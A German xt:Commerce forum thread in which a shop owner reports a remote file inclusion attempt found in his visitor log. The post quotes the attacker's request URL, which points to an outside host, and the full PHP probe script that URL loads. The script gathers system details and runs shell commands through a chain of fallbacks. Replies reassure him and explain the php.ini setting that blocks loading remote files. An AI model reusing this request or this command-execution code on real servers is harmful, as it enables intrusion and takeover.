Jump to content
xt:Commerce Community Forum
Sign in to follow this  
Grisu77

Hackversuch ?!?!

Recommended Posts

Hab eben beim WHO IS ONLINE folgendes gefunden :

00:09:19 0 Guest 74.55.183.82 19:19:18 19:19:18 /shop/index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt??

Jemand versucht aus dem Shop die Seite (oben) auszuführen ...

Rauskommen tut bei der txt.datei folgendes (was ist das ??) :

<?

$dir = @getcwd();

echo "Mic22<br>";

$ker = @php_uname();

$OS = @PHP_OS;

echo "OSTYPE:$OS<br>";

echo "<br>Kernel:$ker<br>";

$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}

echo "Free:".view_size($free)."<br>";

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while([email protected]($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}

}

exit;

Share this post


Link to post
Share on other sites
Guest tuvalu

Das ist ein üblich Eintrag, funktioniert beim aktuellen Shop aber nicht.

Entwarnung.

tuvalu

Share this post


Link to post
Share on other sites

Was bedeutet das ?!

Es gibt Sicherheitseinstellungen (php.ini) mit denen man dem php-interpreter verbieten kann Dateien, resp. Programmdateien, von fremden Servern herunterzuladen. Gelingt es einem Angreifer ein paar eigene Programmbefehle einzuschleusen und zu Ausführung zu bringen kann er mittels der o.g. Funktionalität komplette Fremdprogramme einschleusen die es ihm ermöglichen das System vollständig unter seine Kontrolle zu bringen.

Eben um dieses Einbruchsszenario im Grundsatz zu unterbinden gibt es diesen Schalter in den php-Konfigurationen. Solange keine regulären Anwendungen laufen welche das externe nachladen von Dateien erfordern sollte dies verboten sein.

mfg

Share this post


Link to post
Share on other sites
Sign in to follow this  

×
×
  • Create New...